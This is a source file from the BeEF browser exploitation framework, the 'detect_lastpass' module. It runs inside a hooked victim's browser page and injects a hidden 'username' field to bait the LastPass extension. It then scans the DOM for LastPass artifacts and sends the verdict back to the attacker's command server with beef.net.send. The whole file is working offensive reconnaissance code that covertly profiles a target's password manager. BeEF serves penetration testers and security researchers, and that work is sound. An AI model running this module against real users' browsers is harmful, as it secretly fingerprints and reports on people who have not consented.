GitHub Repository: beefproject/beef
Path: blob/master/modules/browser/detect_lastpass/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function () {
  // Module summary: appends a hidden "username" text input to the page, waits
  // a fixed delay, then inspects the page DOM for artifacts attributed to the
  // LastPass extension and sends a one-line verdict via beef.net.send.
  //
  // Everything read here is ordinary page DOM (style attributes, an iframe
  // name, an element id, inline script text), i.e. state that any script
  // running in the page can observe.

  // Verdict sent at the end; replaced only when one of the checks matches.
  var result = "Not in use or not installed";

  // Base64 of the inline PNG that LastPass inserts into user/pass form fields.
  // The check below looks for this exact string inside an input's style attribute.
  var base64PNG = "iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC";

  /**
   * Appends a hidden text input (id and name "username") to document.body and
   * resolves after a fixed delay.
   *
   * @returns {Promise<void>} resolves with no value once the delay has elapsed;
   *   never rejects explicitly.
   */
  let createInputField = function () {
    beef.debug("Module - Detect LastPass: Generating input field");

    return new Promise((resolve, reject) => {
      var probe = document.createElement("input");
      probe.type = "text";
      probe.id = "username";
      probe.name = "username";
      probe.setAttribute("style", "display:none;position:absolute;visibility:hidden;top:-1000px;left:-1000px;border:none;");
      document.body.appendChild(probe);
      beef.debug("Module - Detect LastPass: Input field generated");

      // Per the module author: Firefox needs some user interaction before the
      // extension acts, so wait 5 seconds there in the hope that one occurs;
      // other browsers get 1 second for the DOM to update.
      var delayMs = beef.browser.isFF() ? 5000 : 1000;
      setTimeout(() => {
        resolve();
      }, delayMs);
    });
  };

  /**
   * Runs the DOM checks and stores the outcome in `result`.
   *
   * The checks form a first-match chain: once a branch's condition holds, the
   * later branches are not evaluated, whether or not that branch changed
   * `result`.
   *
   * @returns {Promise<void>} resolves with no value after the checks have run.
   */
  let detectLastPass = function () {
    beef.debug("Module - Detect LastPass: Looking for input field");

    return new Promise((resolve, reject) => {
      // Every input element that carries an inline style attribute.
      var styledInputs = $j('input[style]');
      var legacyDiv = document.getElementById('hiddenlpsubmitdiv');

      var runChecks = () => {
        // Check 1: an input whose inline style contains the LastPass PNG.
        if (styledInputs.length > 0) {
          beef.debug("Module - Detect LastPass: Input field with 'style' attribute found: " + styledInputs);
          for (var idx = 0; idx < styledInputs.length; idx++) {
            beef.debug("Module - Detect LastPass: Number of potential input fields with 'style' attribute found: " + styledInputs.length);
            var inlineStyle = styledInputs[idx].getAttribute('style');
            if (inlineStyle.includes(base64PNG)) {
              beef.debug('Module - Detect LastPass: Matching inline PNG detected');
              result = "Detected LastPass through presence of inline base64-encoded PNG within input form field";
            }
          }
          return;
        }

        // Check 2: the LastPass iframe, matched by its name attribute.
        if ($j("iframe[name='LPFrame']").length > 0) {
          beef.debug('Module - Detect LastPass: Matching iframe found');
          result = "Detected LastPass through presence of LastPass 'save password' iframe";
          return;
        }

        // Checks 3 and 4 are the older detection methods.
        if (legacyDiv != null) {
          result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
          return;
        }

        if ($j("script:contains(lastpass_iter)").length > 0) {
          result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
        }
      };

      runChecks();
      resolve();
    });
  };

  /**
   * Sends the verdict as "lastpass=<result>" through beef.net.send.
   * The <%= ... %> tags are template placeholders, not JavaScript; they are
   * presumably substituted before this script is delivered (confirm against
   * the module loader).
   */
  function getResult() {
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass=" + result);
  }

  // Order matters: inject the field, wait, inspect the DOM, then report.
  createInputField().then(detectLastPass).then(getResult);

});